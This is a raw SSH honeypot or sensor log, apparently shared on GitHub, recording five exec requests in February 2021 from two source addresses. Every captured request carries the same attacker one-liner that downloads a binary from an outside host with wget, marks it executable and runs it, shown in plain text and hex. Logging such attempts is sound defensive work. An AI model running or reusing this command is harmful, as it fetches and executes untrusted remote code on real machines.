19:39:22.438 services ▶ DEBU 783e Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000dedc0 {{0 0} [0xc000dbcd80] 0} 0xc000e95c80 {0 0} 0xc000e95ce0 0xc000e95d40 0xc000032ec0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e95e00) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e95da0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011494c8 {0 0 0 <nil> <nil>} 824633929584}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032f80 0xc0065a0060 0xc0065a0060 false}) %!s(*ssh.buffer=&{0xc000032fc0 0xc0065a00a0 0xc0065a00a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 19:39:22.438929832 +0000 UTC m=+1544150.720325611, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=47254, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0m1uq8k9kn000dnb0pg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
06:41:22.360 services ▶ DEBU 7ced Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000e40000] 0} 0xc0065784e0 {0 0} 0xc006578540 0xc0065785a0 0xc000032300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc006628570 {0 0 0 <nil> <nil>} 824649040112}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c140 0xc0011fe060 0xc0011fe060 false}) %!s(*ssh.buffer=&{0xc000e9c180 0xc0011fe0a0 0xc0011fe0a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-17 06:41:22.362375011 +0000 UTC m=+1583870.643770813, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=43054, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0mbl48k9kn000dnb5gg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
06:45:17.966 services ▶ DEBU 7d4e Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc006578240 {0 0} 0xc0065782a0 0xc006578360 0xc000032140 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc006578480) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc006578420) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e90770 {0 0 0 <nil> <nil>} 824633926256}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032300 0xc001151640 0xc001151640 false}) %!s(*ssh.buffer=&{0xc000032580 0xc001151700 0xc001151700 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-17 06:45:17.966566009 +0000 UTC m=+1584106.247961833, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=45688, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0mbmv8k9kn000dnb5sg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
16:00:26.520 services ▶ DEBU a883 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000dee000] 0} 0xc0011d61e0 {0 0} 0xc0011d6240 0xc0011d6360 0xc000032140 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa720) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa6c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004827d0 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc0011fe240 0xc0011fe240 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc0011fe280 0xc0011fe280 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-25 16:00:26.521731488 +0000 UTC m=+2308614.803127297, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=136.244.96.12, source-port=41574, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0rsj68k9kn000dnchng, token=c0a8v4ok9kn000dn77n0, type=ssh-request
16:03:19.025 services ▶ DEBU a8e8 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de9a0 {{0 0} [0xc0000ba540] 0} 0xc000efac00 {0 0} 0xc000efac60 0xc000efad20 0xc000e9ca40 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efade0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efad80) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482f08 {0 0 0 <nil> <nil>} 824649042672}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cb00 0xc000e99e00 0xc000e99e00 false}) %!s(*ssh.buffer=&{0xc000e9cb40 0xc000e99e40 0xc000e99e40 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-25 16:03:19.02608191 +0000 UTC m=+2308787.307477687, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=136.244.96.12, source-port=37354, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0rskhgk9kn000dnci40, token=c0a8v4ok9kn000dn77n0, type=ssh-request
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment